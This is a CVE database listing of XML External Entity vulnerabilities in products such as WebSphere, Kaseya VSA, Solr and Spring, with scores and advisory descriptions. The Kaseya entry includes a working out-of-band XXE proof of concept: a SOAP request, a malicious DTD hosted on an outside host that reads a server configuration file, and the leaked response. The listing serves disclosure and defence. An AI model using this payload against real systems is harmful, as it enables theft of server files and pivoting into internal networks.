Total
852 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2021-20453 | 1 Ibm | 1 Websphere Application Server | 2022-05-03 | 6.4 MEDIUM | 8.2 HIGH |
| IBM WebSphere Application Server 8.0, 8.5, and 9.0 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 196648. | |||||
| CVE-2021-28973 | 1 Perforce | 1 Helix Alm | 2022-05-03 | 4.0 MEDIUM | 4.9 MEDIUM |
| The XML Import functionality of the Administration console in Perforce Helix ALM 2020.3.1 Build 22 accepts XML input data that is parsed by insecurely configured software components, leading to XXE attacks. | |||||
| CVE-2021-30201 | 1 Kaseya | 1 Vsa | 2022-04-29 | 5.0 MEDIUM | 7.5 HIGH |
| The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network. | |||||
| CVE-2022-0265 | 1 Hazelcast | 1 Hazelcast | 2022-04-29 | 7.5 HIGH | 9.8 CRITICAL |
| Improper Restriction of XML External Entity Reference in GitHub repository hazelcast/hazelcast in 5.1-BETA-1. | |||||
| CVE-2019-0228 | 3 Apache, Fedoraproject, Oracle | 14 James, Pdfbox, Fedora and 11 more | 2022-04-29 | 7.5 HIGH | 9.8 CRITICAL |
| Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF. | |||||
| CVE-2016-9563 | 1 Sap | 1 Netweaver Application Server Java | 2022-04-29 | 4.0 MEDIUM | 6.5 MEDIUM |
| BC-BMT-BPM-DSK in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to conduct XML External Entity (XXE) attacks via the sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn URI, aka SAP Security Note 2296909. | |||||
| CVE-2022-0272 | 1 Detekt | 1 Detekt | 2022-04-28 | 7.5 HIGH | 9.8 CRITICAL |
| Improper Restriction of XML External Entity Reference in GitHub repository detekt/detekt prior to 1.20.0. | |||||
| CVE-2021-23463 | 1 H2database | 1 H2 | 2022-04-28 | 6.4 MEDIUM | 9.1 CRITICAL |
| The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability. | |||||
| CVE-2022-0221 | 1 Schneider-electric | 1 Scadapack Workbench | 2022-04-20 | 4.3 MEDIUM | 5.5 MEDIUM |
| A CWE-611: Improper Restriction of XML External Entity Reference vulnerability exists that could result in information disclosure when opening a malicious solution file provided by an attacker with SCADAPack Workbench. This could be exploited to pass data from local files to a remote system controlled by an attacker. Affected Product: SCADAPack Workbench (6.6.8a and prior) | |||||
| CVE-2017-2815 | 1 Igniterealtime | 1 User Import Export | 2022-04-19 | 5.5 MEDIUM | 8.1 HIGH |
| An exploitable XML entity injection vulnerability exists in OpenFire User Import Export Plugin 2.6.0. A specially crafted web request can cause the retrieval of arbitrary files or denial of service. An authenticated attacker can send a crafted web request to trigger this vulnerability. | |||||
| CVE-2020-24591 | 1 Wso2 | 5 Api Manager, Api Manager Analytics, Api Microgateway and 2 more | 2022-04-19 | 5.5 MEDIUM | 6.5 MEDIUM |
| The Management Console in certain WSO2 products allows XXE attacks during EventReceiver updates. This affects API Manager through 3.0.0, API Manager Analytics 2.2.0 and 2.5.0, API Microgateway 2.2.0, Enterprise Integrator 6.2.0 and 6.3.0, and Identity Server Analytics through 5.6.0. | |||||
| CVE-2017-12629 | 4 Apache, Canonical, Debian and 1 more | 5 Solr, Ubuntu Linux, Debian Linux and 2 more | 2022-04-19 | 7.5 HIGH | 9.8 CRITICAL |
| Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr. | |||||
| CVE-2021-46365 | 1 Magnolia-cms | 1 Magnolia Cms | 2022-04-18 | 6.8 MEDIUM | 7.8 HIGH |
| An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute XML External Entity attacks via a crafted XLF file. | |||||
| CVE-2018-20843 | 7 Canonical, Debian, Fedoraproject and 4 more | 9 Ubuntu Linux, Debian Linux, Fedora and 6 more | 2022-04-18 | 7.8 HIGH | 7.5 HIGH |
| In libexpat in Expat before 2.2.7, XML input including XML names that contain a large number of colons could make the XML parser consume a high amount of RAM and CPU resources while processing (enough to be usable for denial-of-service attacks). | |||||
| CVE-2019-15637 | 4 Apple, Linux, Microsoft and 1 more | 7 Macos, Linux Kernel, Windows and 4 more | 2022-04-18 | 5.5 MEDIUM | 8.1 HIGH |
| Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS. This affects Tableau Server, Tableau Desktop, Tableau Reader, and Tableau Public Desktop. | |||||
| CVE-2020-9352 | 1 Smartclient | 1 Smartclient | 2022-04-18 | 7.5 HIGH | 9.8 CRITICAL |
| An issue was discovered in SmartClient 12.0. Unauthenticated exploitation of blind XXE can occur in the downloadWSDL feature by sending a POST request to /tools/developerConsoleOperations.jsp with a valid payload in the _transaction parameter. | |||||
| CVE-2022-1018 | 1 Rockwellautomation | 3 Connected Components Workbench, Isagraf, Safety Instrumented Systems Workstation | 2022-04-12 | 4.3 MEDIUM | 5.5 MEDIUM |
| When opening a malicious solution file provided by an attacker, the application suffers from an XML external entity vulnerability due to an unsafe call within a dynamic link library file. An attacker could exploit this to pass data from local files to a remote web server, leading to a loss of confidentiality. | |||||
| CVE-2013-6429 | 2 Pivotal Software, Vmware | 2 Spring Framework, Spring Framework | 2022-04-11 | 6.8 MEDIUM | N/A |
| The SourceHttpMessageConverter in Spring MVC in Spring Framework before 3.2.5 and 4.0.0.M1 through 4.0.0.RC1 does not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service, and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue, and a different vulnerability than CVE-2013-4152 and CVE-2013-7315. | |||||
| CVE-2014-0225 | 2 Pivotal Software, Vmware | 2 Spring Framework, Spring Framework | 2022-04-11 | 6.8 MEDIUM | 8.8 HIGH |
| When processing user provided XML documents, the Spring Framework 4.0.0 to 4.0.4, 3.0.0 to 3.2.8, and possibly earlier unsupported versions did not disable by default the resolution of URI references in a DTD declaration. This enabled an XXE attack. | |||||
| CVE-2016-9318 | 3 Canonical, Xmlsec Project, Xmlsoft | 3 Ubuntu Linux, Xmlsec, Libxml2 | 2022-04-08 | 4.3 MEDIUM | 5.5 MEDIUM |
| libxml2 2.9.4 and earlier, as used in XMLSec 1.2.23 and earlier and other products, does not offer a flag directly indicating that the current document may be read but other files may not be opened, which makes it easier for remote attackers to conduct XML External Entity (XXE) attacks via a crafted document. | |||||